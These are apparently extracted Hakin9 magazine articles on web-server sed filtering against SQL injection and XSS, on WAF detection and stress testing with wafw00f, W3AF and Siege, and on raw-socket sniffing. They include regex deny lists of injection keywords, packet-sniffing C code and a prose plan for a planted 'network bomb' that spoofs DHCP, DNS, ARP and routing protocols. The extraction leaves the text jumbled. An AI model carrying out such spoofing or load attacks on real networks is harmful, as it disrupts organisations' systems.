s/Hello/Goodbye/g

if used). For example, to replace the < symbol by the more appropriate &lt; processing instruction the filter expression is:
s/</\\&lt;/g

oracle iPlanet Web Server 7

With the Oracle iPlanet Web Server 7 the sed filter functionality is delivered as an NSAPI filter in the form of the libsed.so shared object that ships with the product. To configure the web server to perform filtering requires merely configuration in the obj.conf configuration file for the given web site.
Input fn=insert-filter filter=sed-request sed=s/</\\&lt;/g

method=(GET|HEAD|POST|PUT)

is used where the s instigates the search, the two slash / delimited strings identify the string to replace and its target replacement, and the g indicates the operation is to be performed globally within the line up to the newline character. To perform option if-else type operations the branch b syntax is used; which in reality is more of a goto operation. For example, to change a string containing the text STATUS to say closed if the day is Sunday and open otherwise, the following set of commands is used:
/Sunday/ b ifpart s/STATUS/open/g b end :ifpart :end

sed=s/%3c/\\&lt;/g sed=s/%3C/\\&lt;/g sed=s/>/\\&gt;/g

Here the Input fn directive is used to initiate the insert-filter function for GET, HEAD, POST, and PUT HTTP methods, with the sed-request filter interceding in requests, but nothing is configured for interceding in responses. Then each sed= regular expression instruction is executed in order for each request.

Apache-based Web Servers

s/STATUS/closed/g

To encode the basic regular expressions in the Oracle iPlanet Web Server 7 the obj.conf is updated with s= to signify each sed instruction, with the Input fn or Output fn directives identifying whether the input or output streams are to be modified. For the Apache and Oracle Http Servers the InputSed and OutputSed directives are used in the httpd.conf file.

For Apache-based web servers derived from the v2.2 and above code base things may be a little more complex as the mod_sed.so module is not usually shipped with the default build, but is an add on module that makes use of the Apache 2 DSO (Dynamic Shared Object) support that should be compiled into the product via the mod_so.c module and is enabled using LoadModule statements in httpd.conf. First, checks are needed to make sure the mod_so module has been compiled in, so run httpd l
$ httpd -l core.c

How it works

The concept of the sed filter and how it helps protect a site from some attacks is a simple one. The filter sits in the request and response flow of the web server and examines each request as a string for comparison against a set of configured regular expressions. It doesnt get access to the headers, only the request contents as it implements in-process content filtering functionality. The set of regular expressions that are implemented using the basic regular expressions syntax must not be large to avoid impacting performance, but must be substantial enough to protect against major threats at the web server layer. The filters can intervene in both HTTP requests and responses, but for the exercise here only request filters are used to remove any key strings identified in the instruction after the s, with the search string between the first set of / forward slashes and the string to replace it with in most cases nothing between the second set of forward slashes. The g says to perform the change globally. Some characters are special characters and must be escaped with a backslash \. The complete set of sed instructions are compiled and executed against the buffer for the request contents (or response

Compiled in modules: prefork.c mod_so.c

http_core.c

Next the module must be built for installation into the web server code. The mod_sed code can be downloaded from the Apache web site http://httpd.apache.org. To build the module the httpd-devel package must be installed, i.e. as root execute yum install httpd-devel; which will install the necessary Apache Extension Tool apxs into the / usr/sbin directory. Download the files for the modules themselves from the Apache httpd trunk using subversion; i.e.
svn co http://svn.apache.org/repos/asf/httpd/httpd/trunk/ modules/filters/

From the filters directory that this creates copy the following files into a separate directory:

www.hakin9.org/en

27

Hakin9 EXTRA
Table 1. Regular Expression
s/</\\&lt;/g s/%3c/\\&lt;/g s/%3C/\\&lt;/g s/>/\\&gt;/g s/%3e/\\&gt;/g s/%3E/\\&gt;/g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[uU][sS][eE][rR]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[sS][uU][bB][sS][tT] [rR][iI][nN][gG]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[aA][sS][cC][iI] [iI]\\>//g s/\\<[aA][lL][lL]_[oO][bB][jJ][eE][cC][tT][sS]\\>//g s/\\<[dD][rR][oO][pP]\\>//g s/\\<[sS][yY][sS][dD][bB][aA]\\>//g s/\\<[sS][uU][bB][sS][tT][rR][iI][nN][gG]\\>//g s/\\<[rR][oO][wW][nN][uU][mM]\\>//g s/\\<[uU][tT][lL]_[hH][tT][tT][pP]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.*?\\<[tT][oO]_[nN][uU][mM][bB] [eE][rR]\\>//g s/\\<[gG][rR][oO][uU][pP]\\>.*\\<[bB][yY]\\>.{1,100}?\\<[hH][aA] [vV][iI][nN][gG]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.*?\\<[dD][aA][tT][aA][tT][yY][pP] [eE]\\>//g s/\\<[iI][sS][nN][uU][lL][lL]\\>[^a-zA-Z_0-9]*?\x28//g s/\\<[uU][nN][iI][oO][nN]\\>.{1,100}?\\<[sS][eE][lL][eE][cC] [tT]\\>//g s/\\<[iI][nN][sS][eE][rR][tT]\\>[^a-zA-Z_0-9]*?\\<[iI][nN][tT] [oO]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[cC][oO][uU][nN] [tT]\\>.{1,100}\\<[fF][rR][oO][mM]\\>//g s/\x3B[^a-zA-Z_0-9]*?\\<[dD][rR][oO][pP]\\>//g s/\\<[dD][bB][mM][sS]_[jJ][aA][vV][aA]\\>//g s/\\<[nN][vV][aA][rR][cC][hH][aA][rR]\\>//g s/\\<[uU][tT][lL]_[fF][iI][lL][eE]\\>//g s/\\<[iI][nN][nN][eE][rR]\\>[^a-zA-Z_0-9]*?\\<[jJ][oO][iI] [nN]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[fF][rR][oO][mM]\\>. {1,100}?\\<[wW][hH][eE][rR][eE]\\>//g s/\\<[iI][nN][tT][oO]\\>[^a-zA-Z_0-9]*?\\<[dD][uU][mM][pP][fF][iI] [lL][eE]\\>//g s/\\<[dD][eE][lL][eE][tT][eE]\\>[^a-zA-Z_0-9]*?\\<[fF][rR][oO] [mM]\\>//g s/\x3B[^a-zA-Z_0-9]*?\\<[sS][hH][uU][tT][dD][oO][wW][nN]\\>//g s/\\<[dD][bB][aA]_[uU][sS][eE][rR][sS]\\>//g s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[tT][oO][pP]\\>. {1,100}?\\<[fF][rR][oO][mM]\\>//g s/\x5cjavafiles\\>//g s/\\<[lL][oO][cC][aA][lL][hH][oO][sS][tT]\\>//g s/\\<[aA][lL][eE][rR][tT]\\>//g s/\\<[sS][oO][uU][rR][cC][eE]\\>//g s/\\<[fF][uU][nN][cC][tT][iI][oO][nN]\\>//g s/\\<[wW][iI][nN][dD][oO][wW]\\>//g

Operation Removes left angle bracket < Removes left angle bracket < Removes left angle bracket < Removes right angle bracket > Removes right angle bracket > Removes right angle bracket > Removes select X user Removes select X substring Removes select X ascii Removes all_objects (Oracle PL/SQL specific) Removes drop Removes sysdba (Oracle PL/SQL specific) Removes substring Removes rownum (Oracle PL/SQL specific) Removes utl_http (Oracle PL/SQL specific) Removes select X to_number Removes group by X having Removes select X data_type Removes isnull X Removes union X select Removes insert X into Removes select X count Y from Removes [ X drop Removes dbms_java (Oracle PL/SQL specific) Removes nvarchar Removes utl_file (Oracle PL/SQL specific) Removes inner X join Removes select X from Y where Z Removes into X dumpfile Removes delete X from Removes [ X shutdown Removes any dba_users (Oracle PL/SQL specific) Removes select X top Y from Removes @javafiles Removes localhost Removes alert Removes source Removes function Removes window

Category XSS XSS XSS XSS XSS XSS SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection SQL Injection Host and Java Security Host Security JavaScript JavaScript JavaScript JavaScript

28

9/2012 (16)

Web Server SeD Filtering Web Server SED Filtering


Get trained today through our exclusive 7-months handson course. Gain access to our complex LAB environment exploiting vulnerabilities across many platforms. Receive a trainer dedicated to you during the 7 months. 10 different hands-on engagements, 2 different certifications levels.

regexp.c regexp.h sed0.c sed1.c sed.h mod_sed.c libsed.h

Compile these into an Apache module using the apxs Apache extension tool as so:
apxs c mod_sed.c sed0.c sed1.c regexp.c

MONTH 1

Vulnerability Assessment - level 1 Vulnerability Assessment - level 2 Vulnerability Assessment - level 3 Network Penetration Testing - level 1 Network Penetration Testing - level 2

MONTH 2

When all has been compiled successfully, merely copy the mod_sed.so shared object into the modules subdirectory of the web server (e.g /etc/httpd/modules on my CentOS servers).

MONTH 3

Network Penetration Testing - level 3

SQL injection and Cross-Site Scripting basic regular expressions

MONTH 4

The following basic regular expressions provide some simple and fast protections against cross-site scripting and SQL injection attacks at the web server level. However, with crossplatform attacks that rely on the different representations of information in different layers leading to some information often getting past basic filtering this sort of filtering should be applied at additional layers behind the web server (i.e. the application server and database server) to provide real protection and prevent attacks from inside the firewall (e.g. from trusted staff). With the Oracle iPlanet Web Server each of these regular expressions, which allows for mixed-case, the entry is added within the sed= clause from where it is compiled, as outlined above (Table 1). Note that all of the above completely remove problem strings and for real production implementations it may be preferable to just obfuscate the strings with a #; in which case the remaining two slashes above would contain the appropriate number of # characters, e.g. s/\\<[wW][iI][nN][dD][oO][wW]\\>//g would become s/\\<[wW][iI][nN][dD][oO][wW]\\>/######/g.

Web Application Penetration Testing - level 1 Web Application Penetration Testing - level 2

MONTH 5

Web Application Penetration Testing - level 3

MONTH 6

Certification Exam 1 - Certified Cyber 51 Pentesting Professional - (CC51PP)

MONTH 7

Certification Exam 2 - Certified Cyber 51 Pentesting Expert - (CC51PE)

testing

With the implementations above one thing that requires careful configuration is the ordering of the filtering and the proxying in the web server modules; remembering that most Java application servers use a plugin module to proxy the application server and forward requests. It is best to test the proxying independently and then test the filtering with simple basic HTML and PHP before combining the two and getting into order of processing issues and complexities in configuration. For testing the combination I usually write a simple client that forwards some problem text and change the Apache sample Snoop JSP to echo the response. To the example snoop.jsp just add:

<br> <%

Request: java.io.BufferedReader in = request.getReader(); StringBuffer sb = new StringBuffer(); String input; do {

www.hakin9.org/en

29

Hakin9 EXTRA
input = in.readLine(); } while (input != null); %> sb.append(input);

out.write(sb.toString());

And in the client code just open a socket, create a buffer with the problem strings including some you want left alone and send the request:

// Create the socket address to use for the call addr, port); SocketAddress sockaddr = new InetSocketAddress(

If all of the above configuration has been performed properly the result should be that the problem strings are removed from the request text. However, it should be noted that this configuration is hard and differs between application servers. The author here has had generally found the iPlanet deployments with the WebLogic Server easier, but that is more due to longer experience and many hours of trial and error with the help of the original Sun/Oracle iPlanet developers who developed the sed filter/mod_sed modules rather than anything inherently more problematic with the technology. This technique has been successfully used for a large international bank and an international foreign exchange company to provide additional lockdowns. References to the technology can now be found on the OWASP site. Further information can be found at: httpd.apache.org/docs/trunk/mod/mod_sed.html https://blogs.oracle.com/basant/entry/little_history _ behind_mod_sed

// Create an unbound socket

Socket client = new Socket();

int timeout = DEFAULT_TIMEOUT; if (args.length == 4) { } timeout = Integer.parseInt(args[2]);

// This method will block no more than the timeout. // If the timeout occurs, SocketTimeoutException // is thrown. client.connect(sockaddr, timeout); // Build the data we are sending to the socket for (int i=0; i < TESTS.length; i++) { StringBuffer data = new StringBuffer();

data.append(URLEncoder.encode(KEY_TEXT

data.append(

data.append(EQUALS_TEXT);

+ (new Integer(i+1)).toString(), UTF8_TEXT));

data.append(AMPERSAND_TEXT);

URLEncoder.encode(TESTS[i], UTF8_TEXT));

// Now we have our socket we send requests to it, // and echo what we are sending to the screen System.out.println(LINE_TEXT); BufferedWriter wr = new BufferedWriter( client.getOutputStream(), UTF8_TEXT));

new OutputStreamWriter( wr.write(

METHOD_TEXT + SPACE_TEXT

CARRIAGE_RETURN_LINE_FEED);

+ PATH_TEXT + SPACE_TEXT + HTTP_TEXT +

CoLin renouF
is an Enterprise Architect and author in the UK financial services industry; working with security, Java/JavaEE, networking, Unix/Linux and general architecture in the UK. He also more than dabbles in the world of psychology, human learning, and astronomy with particle physics etc ; having studied IT, aeronautical engineering, social sciences and more in his life as an eternal part time student. When not working, writing or being verbally abused by his children; he loves photography, singing, playing guitar, drinking wine, and chatting for hours on end with his friends elsewhere in the world certain of whom he competes with, but would love to spend more real time on the same country with. Colin is always happy to help anyone and loves fine technical debate that involves improving the state of the industry and mankind.

LOCALHOST_TEXT + CARRIAGE_RETURN_LINE_FEED); SPACE_TEXT + data.length() + CARRIAGE_RETURN_LINE_FEED); CARRIAGE_RETURN_LINE_FEED); wr.write(CONTENT_LENGTH_TEXT +

wr.write(HOST_TEXT + SPACE_TEXT +

wr.write(CONTENT_TYPE_TEXT + wr.write(CARRIAGE_RETURN_LINE_FEED);

// Send data

wr.write(data.toString());

wr.write(CARRIAGE_RETURN_LINE_FEED);

30

9/2012 (16)

Air Freshener?

The Industrys First Commercial Pentesting Drop Box.

Pwn Plug.

Printer PSU? ...nope

F E A T U R E S :

J Covert tunneling J SSH access over 3G/GSM cell networks J NAC/802.1x bypass J and more!

Discover the glory of Universal Plug & Pwn


p) 802.227.2PWN

@ pwnieexpress.com
t) @pwnieexpress e) info@pwnieexpress.com

Hakin9 EXTRA

Web ApplicAtion FireWAlls, hoW tough Are they noW?


MAnFred FerreirA What you will learn
How to identify a WAF How to run a vulnerability Assessment based on OWASP Top 10 Web Application Security Risks How to run a stress tool application against a web application

What you should know


How to run Backtrack Interconnect Backtrack to a network Routing configuration, if needed, for laboratories and virtual environments

AF exist from last century, being implemented more than 15 years in regular cycles, now they are back with full capability and faster than never before. Due to the exponential performance of the hardware, integrating in appliances, the capability on layer 7 of OSI model is assured, special the HTTP and HTTPS protocols are fully covered. The link throughput capabilities are amazing, being capable of 10 GB analysis without any impact unless a few microseconds delay. We propose three steps to have metrics concerning the WAF identification, correct WAF configuration against OWASP Top

10 Web Application Security Risks and, WAF and Web Server capability against multiple simultaneous Web page requests I should advice all readers that all the actions described in this article should be carry with the proper approval documentation from the Web sites owners and Security managers, except in case of laboratories and virtual environments specific for those tests. Keep in mind that doing such an attack without the right approval is illegal. There are multiple available applications capable of test WAF and Web Servers in the market, to me, lowering the

Figure 1. Network Topology

32

9/2012 (16)

Web Application Firewalls, how tough are they now?

investment and having at the same time access to multiple tools, I prefer to use BackTrack distribution, the last version 5 release 2 or 3 are perfect. To have a vision at a semi-complex network topology, always important to have references about what we are talking and testing, I have developed an illustration, Figure 1, to establish a baseline. The network topology shows multiple equipments and technologies that are normally available, I could increase the complexity, imputing IPS/IDS or aggregate the technologies in a Cloud environment, virtualizing the database and Web Servers, but to a better visualization they are spread away. From an external point of view, I prefer to put a group of Firewalls, filtering all the traffic and protecting all the perimeter networks, before reach the WAF group, that are more dedicated for Web Services and Databases. I leave an open discussion if the network topology should have in the group of Firewalls, IPS/IDS functions and DNS servers represented, but for this purpose, at this level, I dont represent them to keep the topology as simple as possible. Initially we dont know if the company has a WAF technology, so the first step is to verify if exist at all a WAF in the network, so opening the Backtrack distribution, and accessing the waffit code, through the graphic interface, we reach the waffit directory, Figure 2.

As is showed in the last image, based on the output information, the company has a probability to have a WAF technology is considerable, but be carefully with the conclusions, in the last couple of years, some of the WAF technology available, when confronting to some type of requests, delivery http response code 302 temporarily redirect, that could represent an actual redirect to a generic information page error or just delivery this type of response. Nowadays, based on my last tests, the manufactures have changed the response to a simple code 404 Not found. So, we could have a response from the web server or WAF technology. Based on the last state, I will show some different obtained response to the reader have some references.

Figure 4. Waffit advanced response

Has is verified in a different site, this company have a more complex topology, probably with WAF technology. The reader can verified, there is some closed connections that means that probably the WAF technology are interacting between the client/Server communications, closing some of them. The WAF technology is best demonstrated by the speed that is detects and interacts in the early requests.

Figure 2. Waffit enviroment

After open the waffit directory, we access the python code, developed by Sandro Gauci and Wendel G. Henrique, wafw00f.py, that we have just to evoke the command follow by the web site to test, dont forget the http://, otherwise wont work.

Figure 5. Waffit second advanced response

Comparing the third web site tested to the last tests, is verified that the closed connections has increased, proving that the technology implemented in this company is far more capable. From the 10 requests, 3 were closed. At this point, the reader is wondering if all the companies sites have WAF technologies. In fact some of the best firewalls manufactures have introduced a simplified level of WAF technology, integrated with the IPS function. To be able to distinct them, I introduce a typical IPS response from one of those manufactures.

Figure 3. Waffit command

www.hakin9.org/en

33

Hakin9 EXTRA
When the application start, he will ask if the reader wants to update the database of W3AF, it is always good to update the database weekly or just when is needed to work with. At this time, we just have to fill the target URL name or the IP address and in the profile list, chose OWASP_TOP10. The Plugin will be automatic active. After all in place, the button Start will run the Web tests. The type of alerts, high, medium and low are showed in the bottom, right corner, increasing when is detected a non-conformity that can represent a vulnerability detected or just an incorrect link page. The results are aggregated and available in the third tab, after scan config and log.

Figure 6. Firewall/IPS response

The result has a lower number of tests and the numbers of closed connections are higher. The response from waffit code is similar, when not sure of the technology, delivers always the phrase - seems to be behind a WAF. After the first approach has been done, is time to step to the second phase. The WAF technology has to delivers at least the correct interaction when confronting to 10 Web Application Security Risks. One worldwide not-for-profit charitable organization focused for those problems, denominated OWASP, Open Web Application Security Project has been address the top 10 risks through a dedicated project, they are listed: A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management A4: Insecure Direct Object References A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration A7: Insecure Cryptographic Storage A8: Failure to Restrict URL Access A9: Insufficient Transport Layer Protection A10: Unvalidated Redirects and Forwards

Figure 8. W3AF configuration

With the W3AF application is also possible to verify the HTTP response, comparing to the Waffit code. The next illustration shows the response to one of our tests. To access the Fuzzy requests, chose the wheel on the top of W3AF application, mark in a green circle, change the host identification to the URL web site.

The backtrack distribution have vulnerability scanner capability, executing a web site tests. One of them is the W3AF, Web Application Attack and Audit Framework from Andrs Riancho, which in fact have already a list of OWASP Top 10 security risks profile. So, we have simply our live easier than to run all the tests manually. To access the graphic interface of W3AF, just follow the next illustration.

Figure 9. W3AF request

Besides the typical information with system information and web application version, the reader can verify that the code 404 Not Found was generated against the /$range(10)$ imputed web code. At this point, the third phase is starting, after the phase of identification and a common vulnerability scanning perform is the right period to test the principal equipments that support the communication Client/Server, specially the Web Servers, Load balancers and WAF response to a DoS attempt. I will introduce the Siege application from Jeffrey Fulmer, also available at Backtrack distribution, which has the capability of generating multiple requests. To access the Siege application, follow the next illustration.
Figure 7. W3AF application.

34

9/2012 (16)

Web Application Firewalls, how tough are they now?

If the reader have at the same time access to this tool and the monitoring console of the equipments, I advise to keep an eye on those equipments and when, if they reach 80% to 90% of his capability, It is time to stop, otherwise give a period of progression/standstill, stopping at 5 minutes, after that, 15 minutes, and after that, 30 minutes. I do not recommend passing more than 2 hours running this type of tests. Always verify the log files to have a notion on the delay and stress impressed.

Figure 12. Siege log output

Figure 10. Siege application.

If the reader is running for the first time the Siege application, must run siege.config to be able generates the configuration file. If the reader wants to test a partial page or a group of pages, one of the parameters to past is the URLs, for this tests we will provide just two URLs. But for better performance and analyses the principals URLs should be included. The more URLs in the list, the better notion of the actions taken from the WAF and LoadBalancer will the reader have. Edit the file /etc/urls.txt with vi command, and input the most URLs that the reader can, always associated with the Web site that you want to test. Commands executed in Backtrack distribution, over command line:
# vi /etc/urls.txt

For conclusion compare the longest and shortest transaction, they shouldnt have a difference above 3 to 5 seconds and check the logs or report concerning the action taken by the WAF application and firewalls. Take in account the number of closed connections and any information that could indicate a Denial of Service attach. Look at the CPU allocation and network bandwidth.

conclusion

As a resume of all actions taken through this article the reader is able to identify WAF applications, obtain comparison against Firewalls and IPS system, execute a middle level of scanning vulnerability and in the last phase, execute stress program verification. Those metrics are essential to have a control over the business and the company network, on level of identifying risks, business continuity needs and accurate security measures. A special focus in patch management solution, code revision and bandwidth control is normally needed for permanent problem solving actions.

Press i for insert, write down all the URL, starting each line with http://. At the end, when you dont want to list more URLs, press ! followed by w and q, that means write and quit. For more vi commands, just type man vi to access the manual of vi. After the configuration file, is time to execute the Siege, just type siege to run. It will check the list of URLs in the /etc/urls. txt file and start running the stress program. To stop the test, give a simultaneous Ctrl + c and the program will be interrupt. The Illustration above show the commands executed until the end of the program.

MAnFred FerreirA
is currently an Independent Information Security Consultant & GRC Advisor, who worked 16 years in the information security market, developing in the early years projects for the European committee. He is a Business-Oriented that provides Business Continuity Management and Information Security advisories. He is specialized on security solutions assessment and penetration testing in the context of risk identification and mitigation. Part of information is disclosed in the professional network LinkedIn: pt.linkedin.com/pub/manfred-ferreira/15/536/698 E-mail: manfredf@zonmail.pt Notes Software and information available to support the tests: Backtrack 5 r3, http://www.backtrack-linux.org/downloads OWASP, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_ Project W3AF, http://w3af.sourceforge.net VI, http://anaturb.net/vim_1.htm

Figure 11. Siege running

www.hakin9.org/en

35

Hakin9 EXTRA

SOCKETS API And TCP/IP PROTOCOlS


The core of an attack
COlIn REnOuF

Recently, whilst writing test tools for an implementation of a security defence mechanism a realisation came to the fore as to just how easy it is to write code for attacks. The truth is that the mechanisms put into the sockets API and TCP/IP protocols in the early days to make them easy to manage are also what now provides the core on which to mount an attack. As every good security professional knows, it is important to balance the security of a solution with the cost, which usually relates to ease of implementation and management as much as to new software and hardware.
n this article we will look at the problem at the core of the sockets API, used on multiple platforms as the interface to the TCP/IP communications mechanisms, and a brief overview of the TCP/IP and Ethernet protocols and how the very mechanisms they use to ease management present a risk to any network. These two pieces of knowledge can be combined to produce what I refer to as the network bomb, a simple mechanism to bring down all or a portion of a company network with more damage possible the closer the bomb can be placed to the central core of the network.

The Sockets API PF_PACKET and IFF_PROMISC

Most people in the IT profession would have heard of the sockets API. This was introduced into the early Unix world as part of the Berkeley Software Distribution branch of Unix to ease the implementation of networking code; essentially abstracting the network implementation code behind a file handling paradigm. With the sockets API from a client perspective, a socket is declared as a particular type, is opened or more accurately connected using a connect call, then is written to or read from, and finally is closed; all much like reading or writing to a file. From the server perspective the server will bind the socket to a port, will listen to that port for requests, and when each request comes in it will accept the request. Where only a single packet is to be handled simpler sendto and recvfrom calls are available. The API suite all contains functions to look up hosts by name, and convert between the host byte representation and the network representation. All of these are documented heavily elsewhere and are generally well understood. What generally is not well understood is the variation in uses of the sockets API that have generally fallen into disuse, but

were essential in the early days and represent a risk to the modern TCP/IP network. Many IT professionals will be familiar with the Ethereal or Wireshark for promiscous mode packet sniffing, but may not realise how easy it is to write your own implementation using nothing more than a few small changes to the parameters of standard sockets calls. Once the subtlety of the changes to the standard sockets application code are understood it becomes evident that it is easy to write code listen to wireless networks without actually connecting, or to write a TCP/IP packet or Ethernet frame for transmission with any source or destination parameters, or structure that you want. This represents a great risk as much of the TCP/IP protocol suite relies on some fair play. First, lets look at a typical socket API call to create a socket.
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)

In this call, which is fairly standard in most sockets call, the API is told to open a standard IP socket, with a socket stream to read from it, and that the IP protocol to use is TCP. To provide direct access to the IP stack and below we simply change the PF_INET to be PF_PACKET, and the underlying socket type to be SOCK_RAW to get access to a raw socket including the Ethernet headers, rather than just the IP packet as would be seen if SOCK_DGRAM were used. To see everything from the IP perspective only, as implemented on top of an Ethernet frame we use a final parameter of ETH_P_IP. That is almost all there is to it, but that isnt quite all, in that using ETH_P_ALL for the last parameter allows the Ethernet comms to be accessed. This gives us,
socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)

36

9/2012 (16)

Sockets API and TCP/IP Protocols

where the htons converts the data byte ordering representation from the host to network format and should always be used for portable code. The PF_PACKET/SOCK_RAW code is actually an artifact of Linux, so it is here usually the hackers platform of choice, that the tooling exists; so although the sockets API itself is portable, the code examples here are not.

Code to listen to the packets by copying them to a big enough buffer is now simply written by a call to recvfrom. On Linux the user must have root access.
while (1) {

n = recvfrom(sock,buffer,2048,0,NULL,NULL);

To get structure for the output, the platform specific headers are used, such as linux/in.h or linux/if_ether.h. The returned packet will contain the Ethernet header, followed by the IP header fourteen bytes afterwards, and then the IP data. To output the Ethernet header for the source MAC address just use:
ethhead = buffer;

printf(Source MAC: %02x:%02x:%02x:%02x:%02x:%02x\n, 4],ethhead[5]);

ethhead[0],ethhead[1],ethhead[2], ethhead[3],ethhead[

To get at the IP header, just move to the relevant offset.


Figure. 1

At this point, the network card is still only allowing access to frames and the packets on top of them that are addressed to the network card in this computer, as it is a function of the hardware/ firmware combination to discard other frames and packets observed. To overcome this the card must be placed into promiscuous mode, which allows examination of all traffic through card wherever it is addressed. On most computers administrative or root access is required to switch the card to promiscuous mode, but the code itself is simply a combination of a simple portable ioctl call to get the current network card flags and a following call to flip the promiscuous flag itself, i.e. ethreq->ifr_flags |= IFF_PROMISC;. For a true Ethereal or Wireshark implementation on a heavily loaded network this simple sockets code followed by printf calls to output the packet data would be too slow, but for most uses the code below followed by printf is all that is needed to watch EVERY packet that is seen by a WiFi card without actually being connected to a WiFi network itself; remember the card is in promiscuous mode and is seeing radio waves that form frames. Similarly, if the wlan0 device is replaced with a wired card device such as en0 then packets on a wired network can be monitored.
int sock;

iphead = buffer+14;

printf(Source IP: %d.%d.%d.%d\n, iphead[12],iphead[13], iphead[14],iphead[15]);

Now this just allows us to read packets, but we can write them as well, using functions such as sscanf to fill the buffer with values we want and then the paired sendto call is made. This makes this mechanism the perfect tool for spoofing or for creating malicious packets that can exploit weaknesses in the TCP/ IP protocols to create a denial of service attack that can destroy a network. Lets look at a few potential attacks in what we will refer to as our network bomb.

The network Bomb Application


Overview The objective of this application is cause chaos on a company network and eventually bring down the whole network in a location. The code is broken down into a number of discrete attack vector elements that attack the network infrastructure by making use of vulnerable parts of standard network protocols to confuse PCs, firewalls, VoIP telephones and switches. Although TCP/IP and Ethernet are attacked there is no visibility of the device on the network as the sockets API PF_PACKET and ioctl promiscuous mode accesses are used to spoof the MAC and IP addresses. Some parts of the attack cause inconvenience and confusion for a period of time and then move on, with an aim of occupying IT and network staff whilst the rest of the attack progresses. The code is written in C and consists of a small number of threads one for each attack vector mediating access to the promiscuous PF_PACKET socket via a queue protected by a socket, with a final thread running at a slightly higher authority that takes packets or frames from the queue and transmits them. Assumption Most companies trust the wired LAN connections from their user sites. So, gaining physical access to the target site under the premise of a meeting, delivery, or as cleaning staff and deploying a small credit card sized cheap PC running Linux

unsigned char *iphead, *ethhead; struct ifreq *ethreq;

// First open a raw socket direct to the card, with the // level

// ETH_P_ALL saying we want to see everything at the Ethernet if ( (sock=socket(PF_PACKET, SOCK_RAW, perror(socket); } exit(1);

htons(ETH_P_ALL)))<0) {

// Now use ioctl to put the card into promiscuous mode strncpy(ethreq->ifr_name, wlan0, IFNAMSIZ); ioctl(sock, SIOCGIFFLAGS, ethreq); ethreq->ifr_flags |= IFF_PROMISC; free(ethreq); ioctl(sock, SIOCSIFFLAGS, ethreq);

ethreq = (struct ifreq *) malloc(sizeof(struct ifreq));

www.hakin9.org/en

37

Hakin9 EXTRA
(such as a Raspberry Pi) and placing it under a desk is all that is needed to deploy the bomb to a location. The code is activated remotely or to a schedule, and must run under the root account. Similarly, for wireless attacks the use of promiscuous mode means that the card does not need to connect to the network, but can spoof the unprotected early network connection negotiations to perform an attack or can connect to a network access point with no or limited security protection. For the most damage, a wired connection is required. a topology map of the network so this will confuse the topology map if the appropriate CDP packets are copied to emulate particular devices and spoofed. Attack 6 OSPF Attack This attack thread periodically spoofs OSPF packets based on the configuration traffic it monitors to confuse the network routing tables. Proper security and configuration should prevent this attack from working, but often network engineers assume that their environment inside their company is safe. Attack 7 RIPv2 Attack This attack thread periodically spoofs RIPv2 packets based on the configuration traffic it monitors to confuse the network routing tables. Proper security and configuration should prevent this attack from working, but often network engineers assume that their environment inside their company is safe. Attack 8 BGP Attack This attack thread periodically spoofs BGP packets based on the configuration traffic it monitors to confuse the network routing tables. Proper security and configuration should prevent this attack from working, but often network engineers assume that their environment inside their company is safe. Attack 9 Invalid TCP Packet Counter Reset Periodically this thread will open a socket to any open port (usually an MS standard port such as TCP 139), and will gradually send out of sequence packets and will request resends. This will confuse the network and start to increase error rate mechanisms on network hardware, which will lead to inappropriate management alerts for the network infrastructure and possibly inappropriate remedial action, or will lead to the network infrastructure deactivating itself in extreme circumstances,

Attack Implementation
discover utility Function Thread This function listens for broadcasts continually and builds up a list of MAC addresses to reuse, DHCP server addresses, existing IP addresses (ordered by busiest so a packet count is maintained for each address), and existing DNS servers. This simply uses the offsets in the known Ethernet frames and Packet headers, creates a network structure, and adds the data to linked lists of IP and MAC addresses. Attack 1- dHCP DHCP works by using the Discover, Offer, Request, Accept request-response packets; with the first two as broadcasts. The thread will listen for active TCP/IP addresses and will listen for discover packets, and will then respond with a a random IP address in the packet source address and offer the address of an already active system. When the client requests that address it will grant it. This will cause issues for both the active system and the new client; and when the new client tries to call the DHCP random address the code will respond as if it were the DHCP server. This code will also act with relay agents. Attack 2 dnS This thread will listen for DNS servers responding to requests AND will look for DNS blocks in DHCP packets. To handle switches blocking the view to other communications it will first listen for a MAC address to spoof in a DHCP request of it sees none, and if not will use a dummy MAC address to make the DHCP request. When it has the IP address of the DNS servers it will start returning random IP addresses occasionally whilst impersonating the DNS server. Attack 3 ARP When ARP broadcasts are spotted in this thread a MAC address of a different host will be returned to the caller. Attack 4 Switch This thread will periodically send large batches of Ethernet frames with every MAC address it has discovered, and will spoof addresses close to those it has discovered to fill up the switch MAC address cache and potentially cause redirection of packets. This works because Ethernet frames examine the source MAC address of every call and broadcast and stores it in the switch addressing table so it can copy frames addressed to that target only out through the port it is connected to, so spoofing different values will foll the switch into thinking the given MAC address is connected to that port. Attack 5 Cisco CdP neighbour Attack This attack thread periodically spoofs Cisco Discovery Protocol (CDP) packets to confuse the network infrastructure. The CDP protocol is used by Cisco, and some competitors, to build up

Conclusion

Many other types of attack are possible in addition to the above, and some of the above may not even work if the network is properly configured and managed. There are, however, many variations possible that builds upon the above. The key point to take away from this article is the risk that the sockets PF_PACKET, SOCK_RAW combination represents and the ease with which it can be used for snooping or to cause issues. So, always assume that internal networks are unsafe and build security into every aspect of network design.

COlIn REnOuF
